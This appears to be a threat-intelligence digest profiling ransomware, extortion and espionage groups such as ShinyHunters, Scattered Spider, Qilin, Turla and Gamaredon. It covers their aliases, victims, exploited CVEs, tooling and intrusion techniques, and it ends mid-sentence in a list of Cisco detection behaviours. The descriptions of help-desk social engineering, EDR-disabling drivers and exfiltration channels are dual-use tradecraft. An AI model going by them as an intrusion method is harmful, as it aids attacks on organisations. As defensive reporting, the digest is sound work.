Trending Adversaries

ShinyHunters is a financially motivated cybercriminal extortion group known for data theft and "pay or leak" operations. Aliases in the provided content include bling_libra, shinyhunter, shinyhunters, shiny_hunters, UNC6040, and UNC6240. The content also references Mandiant tracking related ShinyHunters-affiliated vishing activity under clusters including UNC6240 and UNC6661. Based on the provided reporting, ShinyHunters has targeted a wide range of organizations, including insurance, telecommunications infrastructure, sports and entertainment, higher education, and education technology. Reported victims or claimed victims in the content include the National Association of Insurance Commissioners (NAIC), American Tower, Madison Square Garden / Madison Square Garden Sports / Madison Square Garden Entertainment, Instructure Canvas, and the University of Nottingham. The group is described as specializing in extortion and cascading or supply-chain-style campaigns. Multiple reports in the content state that ShinyHunters conducted "pay or leak" extortion, published stolen data on a dark web leak site, and in some cases leaked data after ransom demands were not met. The content specifically describes publication of allegedly stolen data from NAIC, American Tower, Madison Square Garden, Madison Square Garden Sports, and the European Commission-related incident where ShinyHunters later published stolen data. Tactics and techniques directly mentioned in the content include exploitation of Oracle PeopleSoft vulnerabilities, including reporting that ShinyHunters began exploiting a reported PeopleSoft zero-day on May 27 and that more than 100 organizations were compromised before Oracle released an emergency update on June 10. The content also states that ShinyHunters claimed to exploit a combination of zero-day vulnerabilities and older unpatched flaws in PeopleSoft environments, affecting both cloud-hosted and on-premises deployments. Separately, the content repeatedly associates ShinyHunters with social engineering, especially vishing. In the Madison Square Garden Entertainment intrusion, reporting cited in the content says the initial compromise occurred through a voice-phishing call to a low-level employee, leading to theft of Microsoft Entra credentials. The content also says ShinyHunters used a similar vishing playbook against Charter Communications and breached ADT by compromising an Okta SSO account and then moving into Salesforce. The content further notes that phishing-resistant MFA can eliminate social-engineering vectors exploited by groups like ShinyHunters. The group is portrayed as capable of causing major disruption without relying on malware or zero-days in every case. The content explicitly states that groups like ShinyHunters do not necessarily need malware or zero-day exploits to cause massive damage. Reported post-compromise activity includes data theft from ticketing systems, customer support platforms, SharePoint and OneDrive-related environments, and publication of large archives containing customer, corporate, and operational data. The content also links ShinyHunters to broader criminal ecosystem activity. One report says TeamPCP maintained partnerships or overlap with ShinyHunters, and another states ShinyHunters later published data stolen in the TeamPCP-related European Commission incident. The content does not provide high-confidence evidence that ShinyHunters is a nation-state actor; it is described as a cybercriminal group.

Icarus is a newly emerged cybercrime extortion group active since at least April 2026. In the provided reporting, Icarus claimed responsibility for the June 2026 supply-chain attack involving Klue, a market intelligence platform, and the downstream compromise of multiple customers’ Salesforce environments. Public reporting and victim statements describe Icarus as a ransomware or extortion group operating a Tor-based leak site and threatening to publish stolen data unless ransom demands were met. According to the content, Icarus gained access to Klue using a compromised legacy credential tied to an integration service or limited 2022 pilot, then harvested or generated OAuth tokens used by Klue integrations. The group used those tokens to access connected third-party platforms, especially Salesforce, and exfiltrated data in bulk. Reporting also states the attackers implanted or pushed malicious code in Klue’s environment, enumerated victim Salesforce environments through the REST API, and used automated scripts, including Python scripts, to map CRM structures and steal targeted data over sustained periods. The group’s activity in this incident was focused on data theft and extortion rather than disruptive encryption. Stolen data was consistently described as business contact information, CRM records, support case data, sales-related information, pricing quotes, account data, and related business records. Multiple organizations were publicly identified as affected through the Klue compromise, including Huntress, LastPass, BeyondTrust, HackerOne, Jamf, OneTrust, Recorded Future, Snyk, Tanium, Insurity, Sprout Social, Gong, 8x8, Pendo, and others. Icarus added Klue and several customers to its leak site and directly threatened release of the stolen information. The content does not provide high-confidence attribution of Icarus to any nation state. Huntress is cited as attributing the Klue intrusion to Icarus with high confidence, while other reporting noted disputed attribution involving ShinyHunters; therefore only the direct reporting that Icarus claimed responsibility and was independently linked by Huntress to the incident is high confidence here. No aliases or sub-groups beyond the name Icarus are directly supported in the content.

Scattered Spider is a financially motivated cybercriminal threat actor active since at least May 2022. It is also tracked as UNC3944, Octo Tempest, 0ktapus/Oktapus, Scatter Swine, Storm-0875, Muddled Libra, DEV-0971, LUCR-3, Roasted 0ktapus, Star Fraud, and related spellings. Multiple sources in the content describe it as an English-speaking collective, with members primarily based in the United States, the United Kingdom, and Canada, and note that it has recruited teenagers. The group initially targeted telecommunications and business process outsourcing organizations, including activity aimed at gaining access to mobile carrier environments for SIM swapping, and later expanded to other sectors including technology, retail, hospitality, gaming, financial services, managed service providers, manufacturing, law, natural resources, healthcare, airlines, and critical infrastructure. The content links Scattered Spider to attacks or intrusions involving Twilio, Okta customers, MGM Resorts, Caesars Entertainment, Transport for London, Marks & Spencer, Harrods, Co-op Group, SSM Health, and Sutter Health. Scattered Spider is characterized by aggressive social engineering and identity-focused intrusion tradecraft. Reported techniques include vishing, smishing, phishing, adversary-in-the-middle credential theft, MFA fatigue, SIM swapping, impersonation of employees to help desks, impersonation of IT or support personnel by phone, SMS, and Microsoft Teams, and use of harvested personal information to pass identity checks. The group has directed victims to credential harvesting sites, convinced them to run commercial remote monitoring and management tools, and manipulated help desks to reset passwords and transfer MFA enrollment to attacker-controlled devices. The content also notes use of AI voice cloning by fragments of the group to impersonate executives or trusted vendors in calls to internal IT help desks. After access, Scattered Spider has conducted reconnaissance across Windows, Linux, VMware ESXi, Azure Active Directory/Microsoft Entra ID, Microsoft 365, Google Workspace, AWS, SharePoint, Slack, Microsoft Teams, Exchange Online, code repositories, backups, VPN documentation, Active Directory data, and Snowflake access. Reported tooling and techniques include use of legitimate remote access and tunneling tools such as AnyDesk, ScreenConnect, Splashtop, TeamViewer, Pulseway, Tactical RMM, Fleetdeck.io, Level.io, Tailscale, Teleport.sh, Ngrok, LogMeIn, and ConnectWise Control; living-off-the-land techniques; valid accounts; and searches for credential documentation and incident response activity. The group has also been reported using AWS Systems Manager Inventory for discovery and lateral movement targeting. For credential access, privilege escalation, persistence, and defense evasion, the content describes Scattered Spider registering attacker-controlled MFA tokens, adding a federated identity provider to SSO tenants with automatic account linking, abusing self-service password reset and help-desk workflows, and using legitimate remote access tools for persistence. Reported tools and malware include Mimikatz, POORTRY, STONESTOP, AveMaria/WarZone, Raccoon Stealer, VIDAR Stealer, RattyRAT, and Bedevil. The group has used signed or vulnerable drivers to disable security tools, including a maliciously signed Intel Ethernet diagnostics driver and exploitation of CVE-2015-2291 in iqvw64.sys. The content also states Scattered Spider exploited CVE-2021-35464 in ForgeRock AM for unauthenticated remote code execution and privilege escalation on an AWS instance. Scattered Spider engages in data theft, extortion, and ransomware. The content states it has exfiltrated data to services including MEGA and Amazon S3, and has stolen data from repositories, cloud platforms, email, and enterprise systems. It has operated as a ransomware affiliate, including affiliation with ALPHV/BlackCat, and more recent reporting in the content says trusted third parties observed deployment of DragonForce ransomware. Other content also notes Scattered Spider as a notable ransomware affiliate associated with ecosystems including RansomHub and DragonForce. VMware ESXi targeting is specifically highlighted, with reporting that the group can move from initial access to exfiltration and ransomware deployment within hours and has focused on hypervisor-level attacks. The content also includes law-enforcement reporting tying alleged members of Scattered Spider to major intrusions. In the UK, Thalha Jubair and Owen Flowers were identified as key members and pleaded guilty in relation to the 2024 Transport for London attack; reporting also links Flowers to intrusions at SSM Health and Sutter Health. Additional prosecutions and allegations in the content reference members including Tyler Buchanan and Noah Michael Urban.

Qilin is a financially motivated ransomware-as-a-service (RaaS) group active since at least March 2022. Known aliases in the provided content include Agenda, Gold Feather, Qilin, Qilin Gang, Qilin Ransomware, Qilin Ransomware Gang, Qilin Ransomware Group, Qirin, and Water Galura. The group is described as having high scalability, with multiple personas including @Haise promoting Qilin on the RAMP forum. The content places Qilin within a broader ransomware ecosystem that includes affiliates, access brokers, and cooperation or overlap with other crews. Symantec, Carbon Black, and related reporting link the initial access broker Woodgnat, also known as KongTuke, to attacks involving Qilin; Woodgnat has been observed using ModeloRAT and Mistic to obtain and sell access to ransomware operators including Qilin. ModeloRAT was separately observed in attacks that deployed Qilin ransomware. The content also states that DragonForce attempted public cooperation with Qilin and LockBit, and that VX-Underground reported DragonForce, LockBit, and Qilin attempted to establish communication channels. Group-IB reported that Gentlemen was founded by hastalamuerte, described as a former Qilin affiliate. Qilin has broad victim reach. Black Kite’s 2026 European Cyber Risk Report states Qilin operated in 26 of 31 analyzed European countries, giving it the widest geographic reach among the ransomware groups covered. S2W ranked Qilin among the top five highest-risk ransomware groups in H1 2025 and reported that Qilin carried out the most attacks against government agencies in that period, with 12 cases. The content specifically identifies Qilin as highly active in healthcare. It states that Qilin remained one of the most active ransomware groups affecting the healthcare sector in June 2026. A notable incident attributed to Qilin was the June 2024 attack on Synnovis, in which the group targeted the company’s internal network and exfiltrated about 394.1 GB of sensitive patient data shared by several NHS foundation trusts for pathology testing. Reporting in the content states that more than 90,000 NHS patients’ records were affected and that the disruption impacted pathology, blood testing, and diagnostic services across multiple NHS organizations. Based on the provided content, Qilin should be characterized as a major ransomware operation with wide geographic reach, active affiliate or ecosystem relationships, and observed links to initial access brokers and tooling used to facilitate ransomware deployment.

Akira is a financially motivated ransomware group active since at least March 2023. Known aliases in the provided content include Gold Sahara, Howling Scorpius, Punk Spider, and Storm-1567. The group released a Linux variant in June 2023 that has been used against VMware ESXi environments; reported incidents describe attackers gaining access to ESXi hypervisors, shutting down virtual machines, and encrypting .vmdk files. The content states that Akira’s Linux variant uses chunk-based partial encryption logic for large files and has been observed partially encrypting virtual machine-related file types such as VMDK, VHDX, and VDI. The group is linked in the content to exploitation of SonicWall SSLVPN appliances via CVE-2024-40766 since at least September 2024, including compromises of SSLVPN accounts on vulnerable devices. Akira is also mentioned in relation to Citrix brute-forcing activity reported by Rapid7 that ultimately led to Akira and LockBit 3.0 ransomware intrusions. Akira appears in multiple reports as part of broader ransomware ecosystems supplied by the initial access broker Woodgnat, also known as KongTuke. Those reports state that Woodgnat sells compromised network access to ransomware groups including Akira, Qilin, Interlock, Rhysida, 8Base, and Black Basta, and that tools such as ModeloRAT and Mistic have been observed in activity linked to access later used by Akira-associated operations. Victimology in the provided content indicates substantial activity in the United States, with one report stating that Akira, alongside Qilin and DragonForce, draws close to half of its publicly claimed victims from the US. The content also notes continued attacks across Asia, Europe, and North America, identifies Akira as one of the more active groups affecting healthcare in June 2026, and lists it among representative ransomware groups capable of targeting major-event-related organizations. The content does not attribute Akira to a nation state.

World Leaks is a cybercriminal extortion group that emerged in early 2025 as a rebrand of the Hunters International ransomware operation, which had been active since 2023. Reporting in the provided content describes World Leaks as the successor to Hunters International and notes a strategic shift away from file encryption toward pure data theft and leak-based extortion, with the group stealing company data and threatening public release unless payment is made. Known aliases in the content are World Leaks, WorldLeaks, world_leaks, and Hunters International. The group has been linked in the content to incidents affecting organizations in manufacturing, healthcare, technology, consumer services, and energy, with many claimed victims in the United States as well as victims in Europe, Canada, India, and China. Specific victim claims or links mentioned in the content include Tata Electronics, Nike, Dell, Bradford Health Services/Bradford Health Partners, Fred Hutchinson Cancer Center, and other organizations listed on its leak site. For Tata Electronics, World Leaks claimed to have stolen and published more than 200,000 files totaling over 630 GB, and reporting cited alleged exposure of emails, event logs, employee passport copies, SAP-related records, and documents tied to Apple and Tesla. The content also states that World Leaks made ransom demands in connection with Tata Electronics and that researchers observed the data on the group’s Tor-accessible dark web site. In the Nike case, World Leaks claimed theft of 1.4 TB across 188,000 files. The content also notes that some prior claims, such as Dell, involved more limited data than initially implied. The provided reporting states that World Leaks focuses on data exfiltration and extortion rather than encrypting victim systems. One source in the content says the group commonly gains initial access through phishing, compromised credentials, or exploitation of exposed services, then performs data discovery and exfiltration, prioritizing confidential corporate or personal information. The content also notes Hunters International use of Rclone as a primary exfiltration tool with WinSCP as a fallback in some intrusions. World Leaks is described in the content as an active extortion actor in the broader ransomware ecosystem despite its move away from encryption, and one report identifies LockBit, World Leaks, and TheGentlemen as leading groups observed targeting organizations in China.

Evil Corp is a Russian-speaking cybercriminal group, also known as Indrik Spider, that has been linked in the provided content to Zeus and Dridex malware and to multiple large-scale ransomware and money-laundering operations. The aliases provided include DEV-0243, Gold Drake, Manatee Tempest, UNC2165, and Indrik Spider. The content also associates Evil Corp with ransomware operations including WastedLocker, Hades, Macaw Locker, and Phoenix CryptoLocker. The group is repeatedly linked to the SocGholish malware ecosystem. SocGholish, also known as FakeUpdates, is described as a dropper/loader distributed through fake browser update prompts on compromised websites, especially compromised WordPress sites. The content states that SocGholish has been used as an initial access mechanism and that it helped criminals gain access to computer systems. Multiple sources in the content say SocGholish is linked to Evil Corp, and some reporting describes it as a key infection chain used by the group. The content also states that SocGholish has allegedly provided initial access to victims for Evil Corp since at least 2018. The content further notes that SocGholish operators have been tracked separately under aliases including DEV-0206, Gold Prelude, Mustard Tempest, TA569, and UNC1543, and that this activity acts as an initial access broker associated with Evil Corp. Reporting in the content also references Maksim Yakubets in connection with Evil Corp. Operation Endgame reporting cited in the content describes law enforcement disruption of infrastructure tied to SocGholish and Evil Corp, including server and domain seizures and remediation of compromised websites.

Turla is a Russia-linked, state-sponsored cyber-espionage threat actor widely tracked as Secret Blizzard, Venomous Bear, Snake, Waterbug, Uroburos/Ourobouros, Krypton, Summit, and UAC-0194. Multiple cited sources link Turla to Russia’s Federal Security Service (FSB), and the group is described as one of Russia’s longest-running espionage actors, active since at least 2004. The reporting in the provided content focuses on Turla’s use of the .NET backdoor STOCKSTAY, which Google Threat Intelligence Group assessed has been under development since at least December 2022. STOCKSTAY has been used in espionage operations against government and military organizations in Ukraine and against entities with an interest in Italian foreign policy; early related activity was also observed in Italy, the Netherlands, Poland, and Germany. The malware is a modular Windows Forms-based backdoor using secure WebSocket command-and-control, WM_COPYDATA-based IPC, and components for downloading payloads, tunneling traffic, orchestration, persistence, reconnaissance, file operations, registry manipulation, screen capture, and command execution. Researchers reported significant code and architectural overlap between STOCKSTAY and Turla’s KAZUAR framework, and assessed that STOCKSTAY may be developed in parallel with KAZUAR as a redundant or complementary espionage capability. Observed Turla delivery and intrusion methods in the content include phishing emails with malicious RDP configuration files, MSI installers, HTA-based chains, and RAR archives exploiting CVE-2025-8088. Lures repeatedly used academic, diplomatic, and military themes, including abuse of a compromised Ukrainian university account and a diplomatic education platform. Turla also used compromised in-country Ukrainian infrastructure, GitHub-hosted components, compromised WordPress sites, and third-party hosting platforms such as Render and Glitch to stage payloads and obscure infrastructure. The content also notes Turla’s use of Mshta to launch scripts via HTML Applications, its historical association with the Snake implant, and reporting that it used Amadey infections to deploy custom malware against targets in Ukraine. In early 2025, ESET observed collaboration between Gamaredon and Turla, with Gamaredon providing initial access through its loaders for deployment of Turla’s KAZUAR framework. Separate reporting cited in the content also states that Turla previously compromised or used OilRig infrastructure in operations. Overall, the provided material characterizes Turla as an active Russian espionage actor focused on government, military, diplomatic, and related high-value targets, especially in Ukraine, using modular malware, phishing-based initial access, stealthy infrastructure practices, and overlapping toolsets including STOCKSTAY and KAZUAR.

8Base is a financially motivated ransomware operation active since at least 2022, publicly unveiled in May 2023, and widely described as highly active from mid-2023 into 2024. The group is linked in the provided content to the Phobos ransomware ecosystem and is described as an operator or affiliate user of Phobos ransomware, including a customized variant that appends the ".8base" extension to encrypted files and slightly modifies standard Phobos ransom notes. The content also describes 8Base as using double-extortion tactics, with victim disclosures central to its strategy via Tor-based leak sites and at times mirrored through surface-web infrastructure. Its leak-site workflow included staged disclosure, Telegram-based victim negotiation, and outreach to journalists. The group primarily targeted small and medium-sized organizations worldwide, with the content specifically noting victims concentrated in Western countries and sectors including finance, manufacturing, healthcare, and a broad range of other industries. Reported victims or claimed victims in the provided content include the UN Development Programme, the UN International Civil Aviation Organization recruitment database, the Atlantic States Marine Fisheries Commission, and a Canadian agency administering dental benefit plans for disabled people in Alberta. The content ties 8Base closely to Phobos tradecraft and infrastructure. Phobos/8Base activity is described as commonly gaining access via exposed or compromised RDP, phishing, brute force, initial access brokers, and SmokeLoader. During intrusions, 8Base is reported to use SmokeLoader for obfuscation, unpacking, and loading of Phobos ransomware, and SystemBC as a SOCKS5 proxy or RAT to conceal command-and-control traffic, execute commands, deploy payloads, or exfiltrate data. The content also states that Phobos and 8Base disabled security tools, deleted backups, modified registry entries, and in some reporting modified firewall rules to evade detection and maintain access. The provided reporting indicates that 8Base likely did not operate as a fully independent stack. Malware hashes and infrastructure associated with 8Base overlapped with ALPHV, BianLian, Knight, and Play, and the content concludes that 8Base likely operated within a shared-backend ransomware ecosystem rather than as a fully independent group. The content also notes historical public links between access sold by the initial access broker KongTuke/Woodgnat and ransomware crews including 8Base, alongside Qilin, Interlock, Rhysida, Akira, and Black Basta. Operationally, 8Base maintained rotating onion infrastructure, Telegram channels, and a temporary surface-web presence. One report cited 459 recorded victims between May 2023 and February 2025, with the last recorded victim dated 1 February 2025. Multiple sources in the content describe the brand as disrupted, dormant, or fragmented following international law-enforcement action in February 2025, including seizure of its leak site and arrests tied to Operation Aether. Known aliases or related designations directly mentioned in the content include 8base and association with Phobos; one source also states the group used a leak site called "Space Bears."

Black Basta is a financially motivated ransomware operation active since at least 2022. The group is referenced as part of the ransomware ecosystem and has been linked in reporting to initial access obtained by brokers such as Woodgnat/KongTuke, which has been publicly associated with attacks involving Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. Reporting cited here states that in November 2022 Black Basta used the QakBot loader for initial access by hijacking legitimate email threads and sending phishing emails. Black Basta has also been observed exploiting or discussing vulnerabilities and remote access tooling: leaked Black Basta chat logs included active discussion of CVE-2024-3400 in Palo Alto PAN-OS, and the group has been seen exploiting Microsoft Quick Assist for initial access and persistence. CISA #StopRansomware advisories cited in the content state that Black Basta uses PsExec as a primary ransomware propagation tool. Additional reporting in the provided content describes Black Basta operational TTPs in detail, including use of EDR impairment tooling such as AvNeutralizer/AuKill, which telemetry indicated was used exclusively by the group for six months before later spreading to other ransomware actors. SentinelLABS assessed it is highly likely the Black Basta ransomware operation has ties to FIN7. Leaked Black Basta Matrix chat logs from 2025, covering September 2023 to September 2024, portray the group as a mature criminal enterprise with structured operations, two offices in Moscow, collaboration with other ransomware and malware actors, and use of ChatGPT for phishing pretexts, malware rewriting, debugging, and victim intelligence collection. Analysis of those leaks cited in the content reported potential connections to Russian authorities and identified alleged continuity with Conti-era personnel and tradecraft, including references linking leader GG/AA to Conti’s Tramp. The same reporting states Black Basta collaborated with or maintained relationships involving former Conti/Trickbot, BlackSuit/Royal, Rhysida, and Cactus-linked actors, and used or rented malware families and loaders including Pikabot, DarkGate, IcedID, and LummaC2 while developing a custom post-exploitation framework called Breaker. The content also notes Black Basta’s use of Linux/ESXi-focused ransomware is discussed alongside other major ransomware groups, although one cited report found no obvious similarity between Black Basta’s ESXi lockers and Babuk-derived families. Known alias mentioned in the content: Storm-1811.

Interlock is a financially motivated ransomware group, tracked internally by IBM X-Force as Hive0163, that has been running ransomware campaigns since September 2024. Reporting in the provided content describes Interlock as targeting healthcare and other critical infrastructure, as well as education, local government/administration, and other large organizations in North America and Europe. Multiple examples in the content attribute or associate Interlock with attacks affecting DaVita, Kettering Health, Goodwill Industries International, Lexington-Richland School District Five, West Lothian Council, and Texas Tech University Health Sciences Center. The group is described as particularly active against education organizations, with one report stating that 27.3% of its total victims were in that sector, well above the broader ransomware average. Other reporting says Interlock historically targeted education, engineering, architecture, construction, manufacturing, industrial, healthcare, government, and public sector organizations. Interlock has been linked to the TAG-124 / KongTuke / Woodgnat traffic distribution and initial access ecosystem. The content states that KongTuke/Woodgnat acts as an initial access broker selling access to ransomware groups including Interlock, and that Interlock also uses or benefits from TAG-124 traffic distribution services. Interlock has also been associated with malware and tooling overlaps involving Rhysida. IBM X-Force reported strong connections between Interlock and Rhysida, including shared use of the Supper backdoor (also known as SocksShell or WINDYTWIST), similarities between Supper, InterlockRAT, NodeSnake, JunkFiction, and ModeloRAT, and likely overlapping developers or trusted code sharing. Cisco Talos was cited as previously assessing with low confidence that Interlock may have emerged from Rhysida operators or developers. Tactics and techniques directly mentioned in the content include use of trojanized software installers, fake Microsoft Teams download pages, traffic distribution systems, ClickFix-style lures, and fake browser updates for initial access and payload delivery. Interlock has been repeatedly linked to TAG-124, also tracked as LandUpdate808. IBM also reported methodical post-compromise activity including credential theft, use of AZcopy and Advanced Port Scanner, and a custom Windows Defender Application Control policy on Interlock staging servers designed to suppress Defender and endpoint protections. Amazon threat intelligence reported that Interlock exploited CVE-2026-20131 in Cisco Secure Firewall Management Center beginning on January 26, 2026, 36 days before public disclosure, and also noted use of ConnectWise ScreenConnect, Certify, Volatility, custom JavaScript and Java remote access trojans, a fileless Java memory-resident backdoor, and PowerShell-based reconnaissance. The content also notes that Interlock shares similarities with Rhysida in tactics, tools, and encryption behaviors, but the exact relationship is described as unknown. Interlock is not described in the provided content as a nation-state actor.

Rhysida is a financially motivated ransomware group active since at least May 2023 that operates as a Ransomware-as-a-Service platform. Reporting in the provided content describes Rhysida as notable for extorting healthcare organizations and other critical infrastructure, with healthcare, education, and government also cited among affected sectors. Most victims referenced in one IBM X-Force analysis were in the United States. The group has been linked to incidents affecting healthcare organizations and public-sector entities, including claims around Prospect Medical Holdings, Cookeville Regional Medical Center, Columbus city systems, and an airport attack referenced in the content. The content links Rhysida to several upstream criminal service providers and tooling ecosystems. Multiple reports state that the initial access broker Woodgnat, also known as KongTuke, has sold or enabled access for ransomware groups including Rhysida, alongside Qilin, Interlock, Akira, 8Base, and Black Basta. Woodgnat has used compromised WordPress sites, ClickFix/FileFix/CrashFix lures, and Microsoft Teams helpdesk impersonation to obtain access. Rhysida operators have also been associated with use of SYSTEMBC, which Kroll says is favored by Rhysida operators and was deployed after access in at least one healthcare intrusion. Intel 471 also lists Rhysida among groups observed exploiting AnyDesk. The provided content highlights strong links between Rhysida and Interlock. IBM X-Force reported that both groups used the Supper backdoor, also known as SocksShell or WINDYTWIST, and found code and behavioral similarities across Supper, InterlockRAT, NodeSnake, JunkFiction, and ModeloRAT. Both groups were described as relying on trojanized software installers, fake Microsoft Teams download pages, traffic distribution systems, and ClickFix-style lures for initial access and payload delivery. IBM also noted post-compromise use of tools such as AZcopy, Advanced Port Scanner, and credential stealers. Another source in the content states the exact relationship between Interlock and Rhysida is unknown, while Cisco Talos previously assessed with low confidence that Interlock may have emerged from Rhysida operators or developers. Additional reporting in the content discusses a possible rebrand from Vice Society to Rhysida, but this is presented as analysis of a possible rebrand rather than a confirmed fact. The content also references Rhysida in broader ransomware ecosystem reporting, including use of traffic distribution services such as TAG-124 and mention in Microsoft reporting on Fox Tempest-enabled malware-signing activity.

CL-STA-1062 is a Chinese-speaking threat actor active since at least March 2022, conducting persistent operations across East Asia and, from mid-2025 onward, focusing on Southeast Asian government entities and state-owned critical energy infrastructure. Palo Alto Networks Unit 42 assessed with high confidence that CL-STA-1062 overlaps with Cisco Talos-tracked UAT-7237, which was previously linked to campaigns against web hosting infrastructure in Taiwan. Reported targeting includes government agencies, state-owned enterprises in the energy sector, and other critical infrastructure organizations in Southeast Asia, with the activity described as espionage. The actor uses a hybrid toolkit combining open-source and publicly available tools with custom malware. Observed tools include ASPX web shells for exploiting vulnerable web applications and establishing initial access, SoftEther VPN, VNT, Yuze, Mimikatz, and JuicyPotato. The group has disguised tooling as legitimate processes or software, including VMware executables and XDR agents, and has used password-protected RAR archives to stage tools and stolen data. Observed post-compromise activity includes reconnaissance, traceroute-based mapping for lateral movement opportunities, privilege escalation, persistent tunneling, MSSQL data theft, exfiltration of web server source code, and broader data exfiltration. A custom backdoor associated with the actor is TinyRCT, a previously undocumented lightweight C#/.NET backdoor also seen as PerfWatson2.exe. TinyRCT supports arbitrary command execution, file and directory enumeration, file exfiltration, screenshot capture, payload download, and self-deletion. It communicates over HTTP with hardcoded command-and-control infrastructure and uses AES-128-CBC encryption. Delivery observed in reporting used a malicious chrome_setup.zip archive containing a legitimate signed chrome_setup.exe, a malicious chrome_setup.exe.config file, and a rogue MyAppDomainManager.dll to abuse AppDomainManager injection, download the TinyRCT payload, and establish persistence via a scheduled task. Known alias: UAT-7237.

Woodgnat, also known as KongTuke, is a financially motivated cybercrime threat actor assessed to operate primarily as an initial access broker rather than a state-sponsored group. Active since at least May 2024, the group establishes durable remote access in enterprise environments and sells that access to ransomware affiliates and other attackers. It has been publicly linked to ransomware ecosystems including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. Woodgnat’s targeting is described as largely opportunistic. Reported victims span the insurance, education, IT, and professional services sectors, and reporting also mentions schools and insurance firms. The group is associated with the deployment of ModeloRAT, a Python-based remote access trojan, and with the backdoor Mistic, also tracked by Zscaler as MLTBackdoor. In at least one intrusion, Mistic and ModeloRAT were used together. The actor is known for social-engineering-driven initial access. Reported delivery methods include compromised WordPress sites used to serve fake technical alerts and browser-based lures, including ClickFix, FileFix, and CrashFix, that trick users into copying, pasting, or executing malicious PowerShell commands. Since around April 2026, the group has also used external Microsoft Teams messages impersonating IT helpdesk or support personnel to persuade victims to run malicious commands. Observed tradecraft includes multi-stage PowerShell infection chains, DLL sideloading, in-memory execution, credential theft using fake login prompts, reconnaissance with native Windows tools, and use of legitimate utilities including curl, reg.exe, net.exe, PowerShell, certutil, and WMIC. Mistic has been described as a stealthy persistence mechanism that can manage files, execute code received from command-and-control directly in memory, adjust beaconing frequency, and self-delete via a kill switch. Symantec also reported that Woodgnat profiles compromised machines to determine their value and whether access can be sold.

Gamaredon is a Russia-aligned advanced persistent threat group focused on cyberespionage against Ukraine. The content states the group has targeted Ukrainian governmental institutions since at least 2013, and in 2025 exclusively targeted Ukrainian government and military organizations. The Security Service of Ukraine attributes Gamaredon to the 18th Center of Information Security of Russia’s Federal Security Service (FSB), and one cited description identifies Armageddon as a unit of the FSB. Known aliases in the provided content include Actinium, APT-C-53, Aqua Blizzard, Armageddon, DEV-0157, Gamaredon, Iron Tilden, Primitive Bear, SectorC08, Shuckworm, Trident Ursa, UNC530, and BlueAlpha. The group is described as one of the most active Russia-aligned APT groups targeting Ukraine and maintained an aggressive cyberespionage campaign throughout 2025. ESET reported 35 distinct spearphishing campaigns in 2025, with most occurring in the second half of the year. Delivery methods mentioned include archive attachments, XHTML files using HTML smuggling, malicious hyperlinks, Office attachments with embedded malicious macros, malicious LNK files, and RAR archives exploiting CVE-2025-8088 to place HTA downloaders in Startup folders for execution at next login. Gamaredon expanded and refreshed its tooling in 2024 and 2025. The content states it developed six new PowerShell-based tools/downloaders in 2025 and also revived the VBScript weaponizer PteroSetup. Named tools and components mentioned include PteroPaste, PteroDee, PteroCache, PteroDum, PteroOdd, PteroEffigy, PteroSand, PteroPSDoor, PteroVDoor, PteroLNK, PteroGraphin, PteroStew, PteroQuark, PteroBox, PteroTickle, and PteroDespair. PteroPaste is described as combining downloader, USB weaponizer, and persistence-orchestration or runner functionality; it can copy a malicious downloader to connected USB drives while disguising it as a Word document shortcut, retrieve encrypted command-and-control information from Dropbox, and connect to infrastructure hidden behind tunneling services. Other tools fetched PowerShell or VBScript payloads, obtained C2 information from services such as Telegra.ph or GoFile, or supported lateral movement. The group’s tradecraft emphasizes simple but rapidly updated malware, persistent spearphishing, and concealment of infrastructure behind legitimate services. The content states Gamaredon used Cloudflare Tunnels, Cloudflare Workers, Microsoft dev tunnels, Loophole, dynamic DNS, PaaS platforms, No-IP, Clever Cloud, and Supabase to hide backend infrastructure. It also abused legitimate messaging, social media, blogging, paste, and cloud-storage services as dead drops or staging locations, including Telegram, Dropbox, GoFile, Mastodon, Rentry, Telegraph, Codeberg, and resolver websites. The group registered domains to stage payloads and used domains and third-party services to make detection and disruption more difficult. For execution and command and control, the content explicitly notes use of PowerShell, hidden execution via hidcon to run batch files in a hidden console window, and HTTP/HTTPS for C2 communications. Gamaredon tools decrypted additional payloads from C2, decoded Base64-encoded downloader source code, and decoded Telegram content to reveal C2 IP addresses. The group also deployed scripts on compromised systems that automatically scanned for interesting documents, listed files such as Office documents, and used macros that could scan for Microsoft Word and Excel files and inject additional malicious macros. Collection and exfiltration behavior in the content includes automated scanning for interesting documents, file listing, username gathering, and theft from removable media. A Gamaredon file stealer can gather the victim username for transmission to C2 and steal data from newly connected logical volumes, including USB drives. Updated stealers such as PteroPSDoor and PteroVDoor were reported to exfiltrate stolen files to S3-compatible cloud storage providers including Wasabi, Tebi, and Intercolo, with cloud storage becoming the group’s primary exfiltration method in 2025. The content also states that ESET observed collaboration between Gamaredon and the Russia-aligned Turla threat actor in early 2025, and notes prior collaboration with InvisiMole. One cited report says Gamaredon used its loader malware to provide initial access for Turla’s Kazuar framework. Overall, the provided material characterizes Gamaredon as a long-running, Russia-aligned FSB-linked espionage actor that persistently targets Ukrainian state and military entities through large-scale spearphishing, frequent tooling refreshes, USB propagation, and extensive abuse of legitimate online services to conceal command-and-control and exfiltration.

GhostEmperor is referenced with aliases including Earth Estries, FamousSparrow, Operator Panda, RedMike/Red Mike, Salt Typhoon, UNC2286, and UNC5807. Based on the provided content, the most widely recognized current name is Salt Typhoon. The content describes Salt Typhoon as a PRC-linked, China-aligned threat group involved in cyber espionage and persistent access operations, including maintaining long-term access inside major U.S. telecommunications providers in 2024. The group is discussed in the context of Chinese state-sponsored activity and broader Chinese contractor-enabled cyber operations. The reporting associates Salt Typhoon with telecommunications targeting and strategic intelligence collection. The content states that the group operated infrastructure useful for Harvest Now, Decrypt Later collection at scale, and that U.S. regulators cited Salt Typhoon-type incidents when tightening telecom and submarine cable security rules. Additional reporting says U.S. and partner governments attributed Salt Typhoon activity to at least three China-based private firms, and the UK NCSC stated that private firms enabled the activity, though specific tasking relationships and roles remained largely undescribed publicly as of mid-2025. Tradecraft directly associated with Salt Typhoon in the content centers heavily on Cisco network device activity. Splunk analytics tied to the Salt Typhoon analytic story describe suspicious behaviors including Cisco IOS-XE tunnel interface creation with tunnel source and destination plus 10.10.12.0/24 addressing; suspicious use of "request platform software package describe" with shell-style filename patterns; WebUI programmatic configuration via the SEP_webui_wsma_http process; WebUI logins involving local port 21111 as a strong indicator of exploitation; bursts of SSH, Telnet-to-port-22, and ping activity across multiple IPs in a short window; reconnaissance command bursts such as show running-config, show tacacs, show cdp neighbors, show 